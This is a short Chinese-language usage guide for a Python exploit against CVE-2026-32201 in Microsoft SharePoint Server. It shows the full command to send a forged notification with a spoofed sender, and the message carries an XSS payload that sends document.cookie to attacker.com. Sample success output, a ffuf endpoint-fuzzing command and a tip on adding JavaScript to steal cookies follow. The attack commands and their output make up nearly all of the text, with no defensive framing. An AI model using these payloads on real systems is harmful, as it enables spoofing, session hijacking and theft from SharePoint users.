针对 CVE-2026-32201 的 Python 漏洞利用程序——Microsoft SharePoint Server 中的输入验证不当,允许未经身份验证的网络欺骗(C:L/I:L)。
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
输出示例:
[+] 检测到 SharePoint。
[*] 正在向 https://target.com/_layouts/15/notify.aspx 发送伪造请求
[+] 状态:200
[+] 可能成功:检查目标日志/邮件中是否存在伪造内容。
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message 中添加 JS 以窃取 Cookie